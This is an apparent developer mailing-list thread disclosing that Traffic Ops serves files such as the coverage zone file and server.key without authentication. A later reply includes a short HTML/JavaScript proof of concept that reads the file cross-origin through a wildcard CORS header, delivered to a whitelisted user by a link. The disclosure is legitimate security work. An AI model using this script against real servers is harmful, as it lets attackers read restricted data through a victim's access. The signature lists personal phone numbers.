Sorry for bringing this thread from the dead, but I think that it is still exploitable.
Even if ops is protected by ACL, an attacker could use a JS code to access it on behalf of a user who has access to OPS. I've made a proof of concept to show that an attacker can fetch the czf file from ops. This is possible both because the resource requires no authentication and since ops returns "Access-Control-Allow-Origin: *" which allows any host to gain access to these resources. To try it yourself paste the following content in html file and open it in your browser. You should change "ops-host" to your ops hostname. To exploit this, an attacker should send a link with this code to someone who is whitelisted in the ACL. <html> <body> <script> czfUrl = "https://ops-host/coverage-zone.json"; function loadDoc(url, divId) { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById(divId).innerHTML = this.responseText; } }; xhttp.open("GET", url, true); xhttp.send(); } loadDoc(czfUrl,"czf") </script> <div id="czf"></div> </body> </html> *---* *Nir Ichye* Qwilt | Work: +972-72-2221675 | Mobile: +972-54-7630105 | [email protected] On Tue, Sep 19, 2017 at 4:55 PM Dave Neuman <[email protected]> wrote: > Anything in the "public" directory is made public so that other components > (llike Traffic Router) can get to it without authentication. > It is recommended that you have some ACLs in front of Traffic Ops to limit > who/what can access it. > > > > On Tue, Sep 19, 2017 at 1:52 AM, Nir Ichye <[email protected]> wrote: > > > Hi, > > > > It seems that several files in TO can be accessed without credentials. > This > > includes: > > - Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json) > > - server.key (http[s]://<opsDomain>/routing/server.key) > > - and other files in the public folder. > > > > Can you tell if the files are public on purpose and if this could be a > > security issue? > > > > Thanks, > > Nir. > > >
